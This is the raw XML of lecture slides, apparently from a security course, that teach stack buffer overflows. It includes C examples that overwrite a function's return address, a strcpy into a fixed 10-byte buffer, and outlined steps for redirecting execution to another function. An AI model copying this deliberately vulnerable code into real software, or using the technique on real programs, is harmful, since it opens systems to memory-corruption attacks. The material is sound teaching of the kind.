            <a:off x="3505200" y="4687888"/>
            <a:ext cx="1460500" cy="1139825"/>
            <a:chOff x="2208" y="2953"/>
            <a:chExt cx="920" cy="718"/>
          </a:xfrm>
        </p:grpSpPr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2208" y="2953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2266" y="317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247900" y="2286000"/>
            <a:ext cx="1588" cy="29718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1522" name="Group 18"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="2376488"/>
            <a:ext cx="1460500" cy="1219200"/>
            <a:chOff x="2208" y="1497"/>
            <a:chExt cx="920" cy="768"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="21523" name="Group 19"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2208" y="2073"/>
              <a:ext cx="920" cy="192"/>
              <a:chOff x="2208" y="2073"/>
              <a:chExt cx="920" cy="192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208" y="2073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5" name="Text Box 21"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2266" y="2073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buf[3]</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp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08" y="1881"/>
              <a:ext cx="920" cy="192"/>
              <a:chOff x="2208" y="1881"/>
              <a:chExt cx="920" cy="192"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="21527" name="Rectangle 23"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2208" y="1881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8" name="Text Box 24"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2266" y="1881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buf[2]</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="21529" name="Group 25"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2208" y="1689"/>
              <a:ext cx="920" cy="192"/>
              <a:chOff x="2208" y="1689"/>
              <a:chExt cx="920" cy="192"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="21530" name="Rectangle 26"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2208" y="1689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1" name="Text Box 27"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2266" y="1689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buf[1]</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="21532" name="Group 28"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2208" y="1497"/>
              <a:ext cx="920" cy="192"/>
              <a:chOff x="2208" y="1497"/>
              <a:chExt cx="920" cy="192"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="21533" name="Rectangle 29"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2208" y="1497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4" name="Text Box 30"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2266" y="1497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buf[0]</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grp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5029200" y="4191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5029200" y="3657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5029200" y="1905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029200" y="23622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5029200" y="26670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5029200" y="29718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5029200" y="3276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0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5791200" y="2057400"/>
            <a:ext cx="1295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500"/>
              </a:spcBef>
              <a:buClr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buf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5024438" y="2357438"/>
            <a:ext cx="1152525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 flipH="1">
            <a:off x="5024438" y="4130675"/>
            <a:ext cx="1152525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6172200" y="3886200"/>
            <a:ext cx="1524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>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buf + 8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21546" name="AutoShape 42"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:endCxn id="21517" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="2103438"/>
            <a:ext cx="1588" cy="2316162"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/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07372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Reminder – We Don't Teach People to be Attackers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It is illegal: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United States Code, Title 18, Section 1030 (and others)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USA Patriot Act, Homeland Security Act, PROTECT Act</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="675"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="MS Gothic" charset="0"/>
              </a:rPr>
              <a:t>www.cybercrime.gov</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:cs typeface="MS Gothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Basically: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Unauthorized access or use of a computer or network system is illegal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</a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="MS Gothic" charset="0"/>
              </a:rPr>
              <a:t>Unintentional attacks are illegal too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100" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> points to the the return address on the stack </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (*ret) += 7;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505200" y="5881688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3505200" y="3595688"/>
            <a:ext cx="1460500" cy="547687"/>
            <a:chOff x="2208" y="2265"/>
            <a:chExt cx="920" cy="345"/>
          </a:xfrm>
        </p:grpSpPr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2208" y="2265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2266" y="2369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3505200" y="1828800"/>
            <a:ext cx="1460500" cy="547688"/>
            <a:chOff x="2208" y="1152"/>
            <a:chExt cx="920" cy="345"/>
          </a:xfrm>
        </p:grpSpPr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2208" y="115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2266" y="125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ret</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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3505200" y="4687888"/>
            <a:ext cx="1460500" cy="1139825"/>
            <a:chOff x="2208" y="2953"/>
            <a:chExt cx="920" cy="718"/>
          </a:xfrm>
        </p:grpSpPr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2208" y="2953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2266" y="317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3505200" y="4144963"/>
            <a:ext cx="1462088" cy="547687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3581400" y="4114800"/>
            <a:ext cx="1277938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 + 7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0" y="18288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247900" y="2286000"/>
            <a:ext cx="1588" cy="29718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2546" name="Group 18"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="2376488"/>
            <a:ext cx="1460500" cy="1219200"/>
            <a:chOff x="2208" y="1497"/>
            <a:chExt cx="920" cy="768"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="22547" name="Group 19"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2208" y="2073"/>
              <a:ext cx="920" cy="192"/>
              <a:chOff x="2208" y="2073"/>
              <a:chExt cx="920" cy="192"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="22548" name="Rectangle 20"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2208" y="2073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49" name="Text Box 21"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2266" y="2073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buf[3]</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="22550" name="Group 22"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2208" y="1881"/>
              <a:ext cx="920" cy="192"/>
              <a:chOff x="2208" y="1881"/>
              <a:chExt cx="920" cy="192"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="22551" name="Rectangle 23"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2208" y="1881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2" name="Text Box 24"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2266" y="1881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buf[2]</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="22553" name="Group 25"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2208" y="1689"/>
              <a:ext cx="920" cy="192"/>
              <a:chOff x="2208" y="1689"/>
              <a:chExt cx="920" cy="192"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="22554" name="Rectangle 26"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2208" y="1689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5" name="Text Box 27"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2266" y="1689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buf[1]</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="22556" name="Group 28"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2208" y="1497"/>
              <a:ext cx="920" cy="192"/>
              <a:chOff x="2208" y="1497"/>
              <a:chExt cx="920" cy="192"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="22557" name="Rectangle 29"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2208" y="1497"/>
                <a:ext cx="920" cy="191"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9360" cap="sq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58" name="Text Box 30"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2266" y="1497"/>
                <a:ext cx="80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2pPr>
                <a:lvl3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3pPr>
                <a:lvl4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4pPr>
                <a:lvl5pPr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2400">
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF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9pPr>
              </a:lstStyle>
              <a:p>
                <a:pPr algn="ctr">
                  <a:spcBef>
                    <a:spcPts val="875"/>
                  </a:spcBef>
                  <a:buClrTx/>
                  <a:buFontTx/>
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>buf[0]</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22559" name="AutoShape 31"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:endCxn id="22541" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="2103438"/>
            <a:ext cx="1588" cy="2316162"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="93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6037461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>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ex1.c (cont)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endParaRPr lang="en-US" sz="16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void f()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char buf[4];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int *ret;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ret = (int *) (buf + 8);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(*ret) += 7;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endParaRPr lang="en-US" sz="16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int x=0;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f();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x=1; // This instruction is being skipped because </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1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() increments the return address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  printf("x=%d\n",x); // This is the next instruction executed after </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="160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6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90385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Does This Program Do?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a; char address[100];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sub1 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buf[4]; int *ret = (int *) (buf + 8);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a = strtol(address,NULL,16); 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(*ret) = a;			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sub2 (void) {printf("Opps!\n"); exit(0);}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sprintf(address,"%p",sub2);	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sub1();			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1211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Ex2.c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a; char address[100];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sub1 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buf[4]; int *ret = (int *) (buf + 8); 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> points to the return address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a = strtol(address,NULL,16); 		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is the address of sub2()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(*ret) = a;				 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//put the address of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sub2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>() in the return address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sub2 (void) {printf("Opps!\n"); exit(0);}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sprintf(address,"%p",sub2);		 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// Get the address of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sub2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>() function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400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sub1();				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// Call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sub1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()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421898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Does This Program Do?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char input[100];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sub1 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buf[10] = "";          // fixed-size buffer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strcpy(buf, input);}         // copy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> whether it fits or not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void sub2 (void)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{printf("Opps!\n"); exit(0);}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main()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printf("Please enter some input (10 characters max, please):\n");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fgets(input,99,stdin);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sub1();}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38254746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Can We Make it Do?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Run normally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  <a:cs typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>Input “ABC”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37041128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Can We Make it Do?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Run normally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  <a:cs typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>Input “ABC”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21682566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Else Can We Make it Do?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600"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Seg fault (overflow the buffer and overwrite ret. address)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953000" y="5867400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4953000" y="3581400"/>
            <a:ext cx="1460500" cy="547688"/>
            <a:chOff x="3120" y="2256"/>
            <a:chExt cx="920" cy="345"/>
          </a:xfrm>
        </p:grpSpPr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3120" y="2256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Text Box 6"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3178" y="2360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4953000" y="4673600"/>
            <a:ext cx="1460500" cy="1139825"/>
            <a:chOff x="3120" y="2944"/>
            <a:chExt cx="920" cy="718"/>
          </a:xfrm>
        </p:grpSpPr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3120" y="2944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Text Box 9"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3178" y="3161"/>
              <a:ext cx="8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4953000" y="4130675"/>
            <a:ext cx="1462088" cy="547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029200" y="4100513"/>
            <a:ext cx="12779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2667000" y="2743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3771900" y="3276600"/>
            <a:ext cx="1588" cy="20574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667000" y="54102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4953000" y="3276600"/>
            <a:ext cx="1460500" cy="304800"/>
            <a:chOff x="3120" y="2064"/>
            <a:chExt cx="920" cy="192"/>
          </a:xfrm>
        </p:grpSpPr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3120" y="2064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3178" y="2064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buf[9]</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29714" name="Group 18"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="2971800"/>
            <a:ext cx="1460500" cy="304800"/>
            <a:chOff x="3120" y="1872"/>
            <a:chExt cx="920" cy="192"/>
          </a:xfrm>
        </p:grpSpPr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3120" y="1872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3178" y="1872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29717" name="Group 21"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="2667000"/>
            <a:ext cx="1460500" cy="304800"/>
            <a:chOff x="3120" y="1680"/>
            <a:chExt cx="920" cy="192"/>
          </a:xfrm>
        </p:grpSpPr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3120" y="1680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3178" y="168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buf[0]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937372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Still More We Can Make it Do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Execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sub2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()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Font typeface="Times New Roman" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>Know the address of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>sub2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>()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Font typeface="Times New Roman" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>Enter enough characters get to the return address on the stack (overflow the buffer)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Font typeface="Times New Roman" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>Enter the address of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>sub2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>() so that it overwrites the return address</a:t>
            </a:r>
          </a:p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Problem #1: What is the address of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sub2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()?</a:t>
            </a:r>
          </a:p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Problem #2: How many characters to enter to get to the return address?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="675"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Problem #3: How can we “enter” the address of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sub2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
